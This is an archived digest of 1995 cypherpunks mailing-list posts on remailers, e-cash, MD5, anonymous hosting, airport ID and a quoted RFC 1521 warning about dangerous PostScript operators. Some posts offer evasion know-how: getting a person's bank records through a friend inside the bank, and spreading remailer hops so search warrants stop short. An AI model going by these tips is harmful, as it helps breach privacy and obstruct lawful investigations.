>  I completely agree that the reporters on this list make things
> very difficult and people do need to be very careful about posting
> things which will get misinterpreated by reporters.. etc.<


FYI, the day after the Markoff piece ran in the NYT, The Baltimore Sun ran an
article debunking it, based on independent reporting. Generalizing about
reporters is about as intellectually valid as generalizing about hackers.
Michael Dresser, who wrote it
(speaking for myself, not my employer)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 22 Oct 95 10:37:39 PDT
To: cypherpunks@toad.com
Subject: Remailer-in-a-Box, Everyone a Remailer
Message-ID: <acafcb2f5502100446ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:02 PM 10/22/95, Lance Cottrell wrote:

>I think one solution to this problem is to encourage (require) the use of
>pseudonym servers. Having a server like alpha as the entity on the from
>line has several advantages.
>
>1) Less Spam since it takes some effort to set up the nym and it will be taken
>away as soon as the spam starts.
>
>2) The operator can take firm action. When people complain they want you to
>punish the abuser. Typically they want you to pull the offenders account.
>With a remailer there is no account to pull, but with a nym server it is
>easy to kill the account, making the complainer happy.

I fully agree with this point, and have argued for this approach before.

There is no logical or other reason why "physical machine site = a
remailer," even though that has until recently been the norm. ("I have a
machine--I'll run a remailer.")

Rather, a single physical machine site can and should be able to run many
remailers, out of user accounts. (Accounts on systems like Sameer's C2. Or
Hal's remailer running on Portal. Or maybe some of the Mixmaster clients.)

This has a couple of salutory effects:

1. It separates the logical function, and responsibilities, of running a
remailer from the function of maintaining a site.

2. It puts the "risk" on the account holder, not the site owner. (The site
owner can plausibly deny knowing the account was remailing messages.)

3. A proliferation of nyms can be used, as Lance notes, with the "offending
nym" cancelled when trouble arises. (I'm not especially keen on seeing
sysops bow to pressure to kill accounts, but if it happens, better it
happens to a "disposable nym.")

4. Multiplication. Having remailer accounts instead of remailer sites means
an N-fold increase in the number of remailers.

5. A single person could have multiple remailer nym accounts, perhaps
having differing policies.

6. Search warrants and legal speed bumps. If the cops have to get separate
search warrants for N accounts, on M different sites, this will slow things
down. (Hint: The remailer "Ralph" can choose to route messages through N
extra steps, perhaps on several of his own accounts on _distant_ machines.
Faced with a search warrant on "his" account, a la the visits to Penet, he
doesn't have to implicate himself by saying he also owns the N other hops.
Of course, he can do the same thing with remailers operated by
others....I'm just noting that having N remailers under one's own control
has certain elegant advantages.)



>3) The nym server could have a policy of only accepting messages encrypted
>to it, and logging the address the message came from. If confronted, the
>nym server could point to the last remailer in the chain. But that remailer
>could not have known the contents of the message since it was encrypted to
>the nym server.

7. Competition. Picking up on Lance's point, having multiple remailer
accounts under one's own control allows one to experiment with various
policies and operational modes, and to see which are most popular. Great
for evolutionary purposes.

8. Finally, and most importantly, the "remailer in a box" idea, for
turn-key remailers, allows even the timid to operate a remailer FOR THEIR
OWN USE! That is, they don't have to publicize the public key, or the
existence at all of the remailer. But they can use it in their own chain of
hops, for their own messages or for whatever. This facillitates the
"everyone a remailer" idea. It also increases protection ("always include a
remailer under your own control").

I'll stop for now.

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 22 Oct 95 08:17:48 PDT
To: cypherpunks@toad.com
Subject: Lack of secrecy in U.S. Banks
Message-ID: <wkoDDD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ph@netcom.com (Peter Hendrickson) writes:

> 
> I ran across an interesting fragment of the U.S. Code.
> 
> Apparently, the Federal Government may access any banking records

As a former bank employee, I can assure all readers that privacy of banking
records is non-existant. All you need is a friend who works in the computer,
auditing, bookkeeping, or loan department (in that order of preference). If
your friend has worked there long enough, he/she can probably also get
informmation from any other bank in the community. (Don't suggest the
security department. As far as bank transactions are involved, the Auditor
normally handles that.)

To reassure the excessively paranoid, bank employees are normally flooded
with so much information per day that they normally take no interest in any
more of it than their job forces them to. Moreover, when you consider that it
is commonplace for a teller to handle total transactions daily than run well
into six figures, few if any individual transaction attract any attention.

Banking trivia #1: Banks are the only businesses that close their books daily
rather than monthly or quarterly.

Banking trivia #2: When choosing a bank, check out the Cash Over/Cash Under
account on their balance sheets.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMIpbMd74r4kaz3mVAQEi5QP+KYftQ3jKjWFbqqgH65tUB7sONx1poZV0
w8g5OdHlwpG+lU0HeqZlVPlJv+iqmGGo4hCN1sZ5z0LB3FDyeLlO8AQwBHPGadGB
dYUtMhq4gpJEpjJba9jdH7neu57j94/S+3Y0lYA0y/ZqJxbwRRntLMJzAZ0RozDH
SsJsLn/tOlo=
=N8mQ
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 24 Oct 95 09:38:49 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
Message-ID: <199510241633.LAA25052@zoom.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 AM 10/24/95 -0400, Dr. Frederick B. Cohen wrote:
>>  > [...] uses an MD5 checksum which the members
>>  > of this list seem to place unlimited trust in (incorrectly in my view,
>>  > but that would be picking two nits with one keyboard entry).
>> 
>> Can you elaborate with facts on the supposed weakness of MD5 ?
>
>I didn't say that there were any weaknesses in MD5, all I said was:
>	"unlimited trust ... (incorrectly in my view...)"
>
...
>> [btw who talked about 'unlimited' trust ?]
>
>There has been no limit given by anyone on this list to the level of
>trust they place in MD5.  Several people have posted (without
>contention) that MD5 is sufficiently trustworthy to trust billions of
>dollars in commerce to it's being able to prevent a selected plaintext
>attack as eluded to above.  If you think we should trust it, and you
>don't limit your assessment of trust, what other assumption should I
>make? If several people proclaim that trust and nobody stands up in
>disagreement, tacit agreement is my normal (although not necessarily
>justified) assumption. 
>

The dear "Dr." Cohen strikes again:

  It would appear that "Dr." Cohen continues to assume that this list
appeared the moment he first posted, or that we love to type the same
symbols over and over.  This list places no more trust in MD5 than in
IDEA--or RSA, for that matter.  But since banks CURRENTLY trust RSA for
billions of dollars in transactions (and, I believe with fairly small
moduli) this trust is the usual trust of experience.

  In fact there HAVE been discussions of the security of MD5 on this
list--but since they occured before the good "Dr." Cohen arrived, perhaps we
should have them again for his sake.  But since most of us tire of typing
(and reading) endless explainations that we DON'T trust something
absolutely, we don't.  We also don't spend all of our time correcting
slightly overgeneralized statements. And of course there is the small fact
that quite a few people here believe that if anyone is foolish enough to
place absolute trust in an algorithm, who are we to disabuse them?

  But if "Dr." Cohen wishes to discuss the weaknesses of MD5, he should
focus his attention on his prefered whipping dog--PGP.  Some versions of PGP
had an insecure implementation of MD5.  But of course the "Dr." should know
that an insecure implementation is very far from a demonstration that an
algorithm is insecure.


Nathan Zook
---
Now installing Linux 3.0 or something...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sat, 21 Oct 95 19:33:33 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220102.SAA12922@jobe.shell.portal.com>
Message-ID: <199510220058.AA44534@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I was toying with a limited form of this idea earlier, where outgoing
>connections would be limited to http servers.  These are usually on a
>small number of ports, although there are exceptions.  At least it
>would be possible to filter out telnet and rlogin and such for that
>application.  I don't think there are too many bad things you can do
>just by connecting to httpd ports (probably I would be surprised,
>though...).  But doing that would not make as much sense for the ETT
>application.

A more cypherpunky type of application would be to enable anonymous
httpd's so that your clients could advertise their nice/naughty products
and be safe from location identification. If they had to pack up then
they could move to another ISP and reconnect to the anon.net as normal.
(Didnt I just read this in a spam HOWTO?)

The problem I see is when a LEA gets involved and snoops your wires and
traces you back to your starting point and then traces the client that is
supplying nasty httpd services. You wouldnt necessarily be aware of this
occuring either.

Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 22 Oct 95 05:17:18 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: airport security
In-Reply-To: <acaf1d35530210046717@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951022120147.4986A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   I tried to board my 15 year old son on Delta's Sky West in St George 
UT for SLC last week --they _required_ ID, and it took me almost 5 
minutes to back a very polite counter agent down from the requirement. 
   Now, maybe I am an obstructionist, but I have been foregoing the 
IRS deductions for my 5 children since I refuse to obtain SSNs for them. 
Again, that made life interesting at passport time --I entered 
000-00-0000 for the kids and passports were issued.  
   Likewise, I have had more than one hospital _try_ to refuse service for
lack of SSN. 
   At close to 300 lbs and dressed in black and concave inverter reflector
lenses, it becomes an excellent example of "...intimidation is just
another form of communication...." 
   Whether we like it or not, "they" intend to tag us --there was a very
informative article on non-intrusive scanning of the iris for
identification within the last month -not sure which rag. from "their" 
perspective, scanning the iris is far more secure than the imbedded 
chip.  Maybe we can scuttle it on disrcimination against the visually 
impaired! :)
   This topic may be relevant since crypto -probably "their" private
crypto after banning ours- will be essential to establish communications
to the central data bank somewhere under the NSA monolith or whereever... 
On the other, the list topics are too fragmented and I agree with tcm, 
futplex, etc. that we need more concentration on crypto "methods" -rather 
than speculation on what method the Feds are going to try to screw us 
over with next.

On Sat, 21 Oct 1995, Timothy C. May wrote:

> At 2:05 AM 10/22/95, Alan Horowitz wrote:
> >WHy should airplane crashes be more of a cause for disseminating the
> >Surveillance State than Greyhound Bus crashes?
> >
> >I'd be more sympathetic to arguments about an airline's right to write
> >it's contracts as it pleases. Though they are Common Carriers; they can't
> >just offer Contracts of Adhesion at will.
> 
> No crypto relevance--my apologies.
> 
> I am skeptical that the "all passengers must have picture IDs" has much to
> do with identifying corpses after crashes.
> 
> The recent push is certainly associated with the various terrorist threats
> and incidents. The FAA can push for it, and the airlines have little to say
> about it.
> 
> However, I read--probably in the WSJ--that the airlines see this as a
> chance to regain control of "ticket abuse." Corporations often have bought
> up discount tickets without knowing who willl be travelling and on what
> dates. This allows them to have a pool of tickets and saves them a bunch of
> money.
> 
> Reports are that many people showed up at boarding gates with a different
> name than what the ticket said, and had to pay extra to get a current
> ticket (no advance purchase, of course).
> 
> I'm not sure what the compelling lessons are, except that the
> "Identification Required State" is getting closer every day.
> 
> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 22 Oct 95 10:03:45 PDT
To: Wei Dai <weidai@eskimo.com>
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951021145844.29391F-100000@eskimo.com>
Message-ID: <199510221703.NAA02029@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai writes:
> I am writting a program called Encrypted TCP Tunneler, which I hope to
> finish in a month or so.

I never finished my own implementation of IPSEC because I didn't have
time, but I am now in possession of a fully functioning version for
4.4BSD derived systems that was developed at NRL. I'm going to have it
integrated into the NetBSD source tree very soon.

I really encourage Wei and anyone else who's interested in this sort
of stuff to participate in the IPSEC work so that we can try to put
all our effort behind the one standardized solution -- it will make
interoperability much easier at the very least!

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Sun, 22 Oct 95 11:19:19 PDT
To: cypherpunks@toad.com
Subject: Re: airport security
Message-ID: <Pine.OSF.3.91.951022131818.9371D-100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Another aspect of the reqiurement for the name on a ticket is to 
discourage the development of a secondary, uncontrolled market in tickets.

Dan







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 22 Oct 95 14:10:05 PDT
To: cypherpunks@toad.com
Subject: Netscape Logic Bomb detailed by IETF
Message-ID: <199510222108.OAA05412@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


With all of the Noise on this list, and all of the opinion that has been
expressed, opinion which would seek to slander, misrepresent or opinion
which would like to represent itself as fact, it has increasingly become
difficult to separate the wheat from the chaff. 

Clearly, someone has a vested interest which they are expending a 
great deal of effort to protect.  My email to Netscape detailing their 
logic bomb has gone unanswered, and unacknowledged for ten days now.

Ten days is a long time for no "official" comment.  Just as ten days is a
long time not to answer email.

Rather than attacking individual posters, rather than questioning
credentials, rather than scaring journalists, rather than intimidating and
wilfully spreading misinformation to create confusion, rather than doing
any of this, I will simply quote the official minutes of the Internet
Engineering Task Force (IETF) which is the protocol engineering,
development and standardization arm of the Internet Architecture Board
(IAB).

The IETF is a large open international community of network designers,
operators, vendors, and researchers concerned with the evolution of the
Internet protocol architecture and the smooth operation of the Internet. 

Request-For-Comments are a series of memorandums which act as official 
minutes of the IETF.  Request-For-Comments No. 1521 (RFC-1521) Subsection 
7.4.2 is authoritative and has been reviewed and has received 
international approval.

To avoid the accusation, of misquoting, I will simply quote Section 7.4.2
of RFC1521 in its entirety. 

This memorandum has unlimited distribution and is available by FTP from
DS.INTERNIC.NET, NIS.NSF.NET, NISC.JVNC.NET, FTP.ISI.EDU,
WUARCHIVE.WUSTL.EDU, FTP.CONCERT.NET, or FTP.SESQUI.NET. European readers
might be advised to use the United Kingdom repository at SRC.DOC.IC.AC.UK. 
Asian & Pacific Users should probably use the local mirror for
WUARCHIVE.WUSTL.EDU, or alternatively, their local National RFC
repository. 

>7.4.2.     The Application/PostScript subtype
>
>   A Content-Type of "application/postscript" indicates a PostScript
>   program.  Currently two variants of the PostScript language are
>   allowed; the original level 1 variant is described in [POSTSCRIPT]
>   and the more recent level 2 variant is described in [POSTSCRIPT2].
>
>   PostScript is a registered trademark of Adobe Systems, Inc.  Use of
>   the MIME content-type "application/postscript" implies recognition of
>   that trademark and all the rights it entails.
>
>   The PostScript language definition provides facilities for internal
>   labeling of the specific language features a given program uses. This
>   labeling, called the PostScript document structuring conventions, is
>   very general and provides substantially more information than just
>   the language level.
>
>   The use of document structuring conventions, while not required, is
>   strongly recommended as an aid to interoperability.  Documents which
>   lack proper structuring conventions cannot be tested to see whether
>   or not they will work in a given environment.  As such, some systems
>   may assume the worst and refuse to process unstructured documents.
>
>   The execution of general-purpose PostScript interpreters entails
>   serious security risks, and implementors are discouraged from simply
>   sending PostScript email bodies to "off-the-shelf" interpreters.
>   While it is usually safe to send PostScript to a printer, where the
>   potential for harm is greatly constrained, implementors should
>   consider all of the following before they add interactive display of
>   PostScript bodies to their mail readers.
>
>   The remainder of this section outlines some, though probably not all,
>   of the possible problems with sending PostScript through the mail.
>
>   Dangerous operations in the PostScript language include, but may not
>   be limited to, the PostScript operators deletefile, renamefile,
>   filenameforall, and file.  File is only dangerous when applied to
>   something other than standard input or output. Implementations may
>   also define additional nonstandard file operators; these may also
>   pose a threat to security.  Filenameforall, the wildcard file search
>   operator, may appear at first glance to be harmless. Note, however,
>   that this operator has the potential to reveal information about what
>   files the recipient has access to, and this information may itself be
>   sensitive.  Message senders should avoid the use of potentially
>   dangerous file operators, since these operators are quite likely to
>   be unavailable in secure PostScript implementations.  Message-
>   receiving and -displaying software should either completely disable
>   all potentially dangerous file operators or take special care not to
>   delegate any special authority to their operation. These operators
>   should be viewed as being done by an outside agency when interpreting
>   PostScript documents.  Such disabling and/or checking should be done
>   completely outside of the reach of the PostScript language itself;
>   care should be taken to insure that no method exists for re-enabling
>   full-function versions of these operators.
>
>   The PostScript language provides facilities for exiting the normal
>   interpreter, or server, loop. Changes made in this "outer"
>   environment are customarily retained across documents, and may in
>   some cases be retained semipermanently in nonvolatile memory. The
>   operators associated with exiting the interpreter loop have the
>   potential to interfere with subsequent document processing. As such,
>   their unrestrained use constitutes a threat of service denial.
>   PostScript operators that exit the interpreter loop include, but may
>   not be limited to, the exitserver and startjob operators.  Message-
>   sending software should not generate PostScript that depends on
>   exiting the interpreter loop to operate. The ability to exit will
>   probably be unavailable in secure PostScript implementations.
>   Message-receiving and -displaying software should, if possible,
>   disable the ability to make retained changes to the PostScript
>   environment, and eliminate the startjob and exitserver commands.  If
>   these commands cannot be eliminated, the password associated with
>   them should at least be set to a hard-to-guess value.
>
>   PostScript provides operators for setting system-wide and device-
>   specific parameters. These parameter settings may be retained across
>   jobs and may potentially pose a threat to the correct operation of
>   the interpreter.  The PostScript operators that set system and device
>   parameters include, but may not be limited to, the setsystemparams
>   and setdevparams operators.  Message-sending software should not
>   generate PostScript that depends on the setting of system or device
>   parameters to operate correctly. The ability to set these parameters
>   will probably be unavailable in secure PostScript implementations.
>   Message-receiving and -displaying software should, if possible,
>   disable the ability to change system and device parameters.  If these
>   operators cannot be disabled, the password associated with them
>   should at least be set to a hard-to-guess value.
>
>   Some PostScript implementations provide nonstandard facilities for
>   the direct loading and execution of machine code.  Such facilities
>   are quite obviously open to substantial abuse.  Message-sending
>   software should not make use of such features. Besides being totally
>   hardware- specific, they are also likely to be unavailable in secure
>   implementations of PostScript.  Message-receiving and -displaying
>   software should not allow such operators to be used if they exist.
>
>   PostScript is an extensible language, and many, if not most,
>   implementations of it provide a number of their own extensions. This
>   document does not deal with such extensions explicitly since they
>   constitute an unknown factor.  Message-sending software should not
>   make use of nonstandard extensions; they are likely to be missing
>   from some implementations. Message-receiving and -displaying software
>   should make sure that any nonstandard PostScript operators are secure
>   and don't present any kind of threat.
>
>   It is possible to write PostScript that consumes huge amounts of
>   various system resources. It is also possible to write PostScript
>   programs that loop infinitely.  Both types of programs have the
>   potential to cause damage if sent to unsuspecting recipients.
>   Message-sending software should avoid the construction and
>   dissemination of such programs, which is antisocial.  Message-
>   receiving and -displaying software should provide appropriate
>   mechanisms to abort processing of a document after a reasonable
>   amount of time has elapsed. In addition, PostScript interpreters
>   should be limited to the consumption of only a reasonable amount of
>   any given system resource.
>
>   Finally, bugs may exist in some PostScript interpreters which could
>   possibly be exploited to gain unauthorized access to a recipient's
>   system.  Apart from noting this possibility, there is no specific
>   action to take to prevent this, apart from the timely correction of
>   such bugs if any are found.

Hopefully this sets the record clear, once and for all with authority 
whose credentials cannot be questioned nor attacked.

I wonder though, did Netscape not know about RFC1521??

You'd expect them to, wouldn't you??




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjsus@atlanta.com
Date: Sun, 22 Oct 95 11:38:06 PDT
To: cypherpunks@toad.com
Subject: Interesting Newsletter - GSSN Oct 1995
Message-ID: <199510221842.OAA15920@atlanta.com>
MIME-Version: 1.0
Content-Type: text/plain



                 GLOBAL STRATEGIC SYSTEM NEWSLETTER

                          October, 1995

    Information Security System Responsibilities, Structure and Development

Is your vital business information safe or are you just assuming that this
information is safe? Have you established an adequate Information Security
System (ISS) to protect your key information against unwanted external or
internal visits and use? The changes in the usage and utilization of the
information technology have created new requirements for both the
information management and its security. However, still too often businesses
and companies do not take the information protection seriously enough to
establish proactive information security systems and other controls. If some
controls have been established, these controls often focus primarily on the
physical security instead of the company-wide information security. The
business information such as business plans, market strategies, trade
secrets and others is a very valuable organizational asset, and it would be
foolish not to initiate adequate security controls to protect this key asset
within the whole organization including physical facilities, employees,
external contractors, computers systems, contract negotiation processes and
any other business process. 

Who is responsible for the information security? Everybody. However, the
extent of this responsibility varies from one function to another or from
one person to another. Fundamentally, the top management including the
organization's CEO is responsible for establishing the information security
system. The top management is responsible for defining, documenting and
comunicating the company-wide information security policy to all levels of
the organization. In addition, the executive management may establish either
specific or general information security objectives to transform the
organization from one situation to a more protected situation. The executive
management is also responsible for appointing the Information Security
Officer (ISO), who performs and acts as the Management Representative and
has the authority and responsibility to establish, implement and maintain
the information security system. All other members of the organization are
responsible for implementing the information security policy in their daily
activities. Some individuals may have additional responsiblities such as ISS
auditing and monitoring in accordance with the documented and planned
information protection arrangements. The top management is responsible for
reviewing the performance and suitability of the system periodically to
ensure its suitability and any need for revising the policy, objectives or
the system itself.

The structure of ISS is unique to each organization. The responsibilities
and authorities are different in all systems, because organizations are
unique. However, there are some general requirements that can be used to
design and develop the unique ISS for any organization, but still meet basic
and fundamental information protection requirements. These requirements can
include all or some of the following main categories: Management
Responsibility, Client / Customer Contract Security, Information Systems
Design and Development, Document and Data Control - & Configuration
Management, Purchasing Information Security, Facility Management and
Physical Security, Information Systems Management, Information Security
System Audit, Personnel and Employee Security, Legal Information Security
Matters, Counter Information Security System Activities and Information
Security Insurance Administration. Each of these general categories have
more detail and specific requirements including both documentation, activity
recording and data control requirements. Using these requirements and any
guidelines, the business can establish its unique information security
system that protects the integrity of the information effectively and
accurately.

The information security system has to be designed and then developed to
eliminate any potential security risks. This requires planning and proactive
thinking. The development can start from the Information Security Policy and
Objectives that is developed by the executive management. After this the
completed system manual can be developed by the Information Security
Officer. This ISS manual should make reference to all applicable additional
procedures and instructions that are used within the system. Typically,
these procedures (such as Information Security Disaster Plan and Procedures)
described WHOs, WHATs, WHENs, WHEREs and in some cases also HOWs such as
back-up instructions and methods. If it is necessary, additional security
plans can be developed for any specific project or process. These plans
should be consistent with an overall ISS. The masterlists or other
equivalent methods should be developed and maintained to control all ISS
plans and documentation. The planning of the information security system
provides an excellent opportunity for the management to evaluate and analyze
all information risks and design practical and useful approaches to
eliminate these risks.

Nobody should underestimate the need for the ISS, but this need should not
be artificially created either. The information security system as any
system has to be practical and really bring tangible benefits. This is one
reason why the information security assessment should be performed prior to
the development project. This assessment can identify both weaknesses and
strengths in the information security. Careful evaluations can help the
business to focus on real issues, and not to develop the system that meets
some imaginary requirements, but fails to address those key areas and
functions of the organization, where additional controls would really be
needed. The information security system should be developed for the
management, but the ISS users do also include all employees within the
organization - and as in many other organizational development, the complete
implementation of the ISS shall be dependent on the employee security and
their awareness. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 22 Oct 95 15:12:05 PDT
To: cypherpunks@toad.com
Subject: request for binary: ec211u16.exe
Message-ID: <199510222206.PAA03547@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I'm wondering if anyone has the following binary from
digicash: ec211u16.exe . If so please contat me. Thanks.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sat, 21 Oct 95 23:33:14 PDT
To: sameer@c2.org (sameer)
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <199510220349.UAA04621@infinity.c2.org>
Message-ID: <199510220457.AA22856@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>alpha.c2.org will soon start provided anonymous web page
>services.  You can get normal webserver access (the alpha.c2.org web
>pages will be very limited) through an anonymous shell account.

>> A more cypherpunky type of application would be to enable anonymous
>> httpd's so that your clients could advertise their nice/naughty products
>> and be safe from location identification. If they had to pack up then
>> they could move to another ISP and reconnect to the anon.net as normal.
>> (Didnt I just read this in a spam HOWTO?)

>> The problem I see is when a LEA gets involved and snoops your wires and
>> traces you back to your starting point and then traces the client that is
>> supplying nasty httpd services. You wouldnt necessarily be aware of this
>> occuring either.

How do you propose to protect entities wanting to utilise this function from

a) people sniffing the tcp packets coming in to discover who is maintaining
   a web page,

b) the above LEA attack where your own lines are monitored and data is tracked
   back thru the various networks to the web page maintainer?

c) an open LEA confrontation where they issue a warrant demanding any and all
   info you have on the web page maintainer. (e.g. co$ doesnt like whats on
   one of the pages)

The same again for the anon shell accounts.

Apart from a once off mailed to you via remailer, the creator of a web page
needs to maintain their creations. This implies a means of accessing it that
is repeatable. Wether thats via a dialup account or over the net, it can be
traced. It's only when the entity uses channels outside of the jurisdiction
or capabilities of those monitoring that some anonymity can be achieved.
(Implies they weren't monitored entering the blinding channels in the first
place).

Cheers,
Mark
mark@lochard.com.au



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 22 Oct 95 14:45:35 PDT
To: cypherpunks@toad.com
Subject: Re: BlackNet in "Hardware" (fwd)
Message-ID: <199510222149.QAA02021@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> >No book report here, but it was as gripping as the rest of her efforts.
> >It's "about" people rather than computer hackery, but the computery bits
> >were done quite well.  Does an Amiga 2000 <really> have PC and Mac
> >compatibility options?  I don't know, and it doesn't matter anyway.
> 
> I recollect that the Amiga had some gizmo--I think it was called
> "MagicSack" or something like that--that let it run Macintosh programs,
> sort of. It never really caught on, at least as an alternative to real
> Macs. And I think something similar was available for DOS. This was all
> several years back, before the Amiga faded out.
> 
> Amiga users and former Amiga users can probably tell us more.
> 

The Amiga has both hardware and software emulation of both Dos and Mac. The
hardware Mac emulator runs faster than an actual Mac. The software emulator
runs ok, but is about 2-3 times slower than an equivalent Mac.

The Amiga 2000, 3000, and 4000 have PC compliant slots that harbor a
co-computer in the guise of a bridgeboard. The software emulators pretty
much suck because they are slow.

There are currently 6 Million Amiga users, hardly 'faded out.

The Amiga did not fail because it lacked in either hardware or software. It
failed because of market momentum and a lack of marketing savy at Commodore.
Only somebody who has never used an Amiga for an extended time would ever
make a comment implying they were inferior in any technical way. Their
hardware architecture in still way ahead of both Windows and Mac as is their
operating system.

Just remember, nobody ever lost their job by buying IBM.

                                                   Jim Choate
                                                   CyberTects
                                                   ravage@einstein.ssz.com

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Sun, 22 Oct 95 16:20:25 PDT
To: cypherpunks@toad.com
Subject: How can e-cash, even on-line cleared, protect payee identity?
Message-ID: <199510222320.RAA27764@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Well I've decided that the best way to learn is to stick my neck out
and say something probably stupid in public.  So here I go again:


In an on-line clearing e-cash scheme, Chaum's "double-spender
identifier" fields are unnecessary, but a "serial number" type field
to uniquely identify the e-coin is still necessary.  Using blinding,
this serial number may be unknown to the bank, but it will be known
to the payer.  If the payer and the bank are collaborating to
identify the payee, then they can simply use this serial number to
identify the recipient of the coin.


Is there a scheme which will prevent this collusive payee 
identification, and if so where can I read about it?  (On-line is 
preferable of course, but I don't expect to be that fortunate.)


Now even if it were the case that the payee is always identifiable
by a collusion of the bank and the payer (such as is the case in
DigiCash Ecash), all this means is that you shouldn't accept a coin
using one nym, and deposit it in the bank using another.  You need
one bank account per nym, as well as one bank account per
anonymous transaction, and then you have complete control over
revelation of your identit(y/ies).


I can imagine a future in which this requirement is not difficult to
meet.  Perhaps it will be the case that you can accept a coin, open
up a new ("anonymous") account with the bank, deposit the coin, 
withdraw a new coin of the same amount, close the account, and now 
have an untraceable coin all in a fraction of a second.


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMIrRpvWZSllhfG25AQFWTQQAgxDWvYrBpoM5D0Idn7ZeCHbZSxMGFr50
Ut40sE83Yfctb6nJdrA+trpynEcu1wJkBbZ7zKDw/TFEUHZy1v4lhZPe+yxmYZcD
w9fPC5HaJQqcTp/hhiw9L4iMswdbrmJu/SkUz85ZVosy8blasdOgFwcoZTIFpZHk
tyATeEGYygo=
=xqJ6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 22 Oct 95 17:48:51 PDT
To: cypherpunks@toad.com
Subject: Real ECash from Mark Twain Bank
Message-ID: <199510230047.RAA17045@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


<URL:http://www.marktwain.com/ecash.html> will apparently have info on
its "real ecash" starting late Sunday, October 22.  It is not there yet
at 6 PM pacific time.

<URL:http://digicash.support.nl/publish/ec_pres3.html> will have a press
release soon, as well.  Here is what it says now:

> First Real Electronic Cash Launched
> 
> Copyright ) 1995 by DigiCash bv. 
> 
> FOR IMMEDIATE RELEASE (Release Date: October 23, 1995)
> 
>       This page will be available very soon. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Sun, 22 Oct 95 18:45:43 PDT
To: cypherpunks@toad.com
